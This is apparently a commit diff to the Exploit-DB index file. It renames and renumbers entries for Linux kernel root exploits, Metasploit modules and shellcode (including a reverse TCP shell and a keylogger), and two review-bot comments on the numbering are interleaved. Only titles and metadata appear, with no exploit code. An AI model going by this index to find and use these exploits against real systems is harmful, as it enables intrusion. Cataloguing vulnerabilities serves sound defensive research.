DB: 2016-06-23

4 new exploits

Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)
Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)

Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)
Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)

Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)
Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)

Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)
Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)

Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)
Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)

Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)
Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)

Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)
Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)

Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)

Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)

UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)

Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)
Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)

Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)
Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)
Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)
Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)

PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)

Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)
Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)

Poison Ivy 2.1.x C2 Buffer Overflow (msf)
Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)

Bomgar Remote Support Unauthenticated Code Execution (msf)
Bomgar Remote Support Unauthenticated Code Execution (Metasploit)

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)
Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)

DarkComet Server Remote File Download Exploit (msf)
DarkComet Server Remote File Download Exploit (Metasploit)

PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)
Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)
Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode
Offensive Security 2016-06-23 05:06:16 +00:00
parent 0fe9b46f79
commit 412cc0a204
6 changed files with 902 additions and 183 deletions


@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0
892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port
5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0
5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0
5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0
@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
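Review bot: with 9641 going from (5) to (3) here, the 'sock_sendpage()' suffixes set by this commit no longer follow id order: 9435 keeps (1), 9436 becomes (4), 9479 becomes (5), 9598 becomes (2) and 9641 becomes (3). If the intent is to renumber by author or exploit family rather than by id, a line in the commit message saying so would stop the next editor from "fixing" it back; otherwise (2)/(3)/(4)/(5) in id order (9436, 9479, 9598, 9641) is the convention the other numbered pairs in this file follow (19551/19552, 19554/19555, 39959/39960).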
@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port
15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port
17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0
17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0
17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0
17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0
17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0
@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port
19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0
19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0
19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0
19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0
19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0
@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0
40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
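Review bot: the new 40003 row is inserted between 39277 and 39278 and carries 39277's date, 2016-01-19, while the other rows this commit adds (39999, 40004, 40005) are appended at the end of the file with 2016-06-22. If 40003 is the Federico Bento variant being split out of 39277, the date column is the thing to confirm; either way, placing the row in id order between 39999 and 40004 keeps the file sorted like the rest of this commit's additions.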
@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port
39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0
39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80
39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
